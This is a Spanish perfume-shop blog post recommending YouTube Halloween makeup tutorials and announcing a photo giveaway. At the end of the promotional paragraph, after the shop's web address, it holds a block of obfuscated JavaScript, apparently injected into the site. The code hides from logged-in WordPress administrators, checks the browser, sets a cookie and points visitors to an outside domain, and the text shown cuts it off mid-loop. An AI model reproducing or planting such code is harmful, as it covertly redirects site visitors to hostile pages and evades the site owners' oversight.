perfumes online

Este fin de semana se celebra una de las fiestas más divertidas del año y es que Halloween ya está aquí.

Hoy os traemos una recopilación de ideas con su paso a paso para que aquellas rezagadas o rezagados que aún no sepan como van a maquillarse para Halloween.

Cris Díaz del canal de Youtube Ssweetcriss nos explica paso a paso su maquillaje de diablesa sexy.

Raquel del canal de Youtube Reishe nos propone un divertido look de Zombie inspirado en el Pop Art.

Sarai Alma del canal de Youtube Saraialma nos enseña a conseguir un auténtico maquillaje de bruja.

Silvia Quirós del canal de Youtube con su mismo nombre nos presenta un maquillaje elegante basado en las famosas Catrinas mexicanas.

Por último nos encanta la versión del tema Bloody Mary de Lady Gaga que Esther a preparado para su canal Gotymakeup3.

Esta es solo una pequeña selección de lo que podréis encontrar en cualquiera de sus canales ya que todas ellas tienen más videos con maquillajes espectaculares y muy fácilmente explicados.

Así que ya no hay excusa para no disfrazarse este Halloween, pero por si a caso no estáis totalmente motivados os traemos una sorpresita más.

Y es que desde Perfumes Tin Tin hemos preparado un sorteo y es que si subes una foto de tu maquillaje/disfraz de Halloween puedes completar tu estilo ganando la fragancia Halloween de Jesús del Pozo.

Haz clic aquí y participa en el sorteo:

Concurso Halloween perfumes online tintinPuedes subir tus fotos en cualquiera de nuestras redes sociales: Facebook, Twitter o Instagram con el hashtag #HALLOWEENTINTIN.

 

Además sólo por participar recibirás un exclusivo descuento para tus compras en perfumería y cosmética en nuestra web www.perfumestintin.com var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone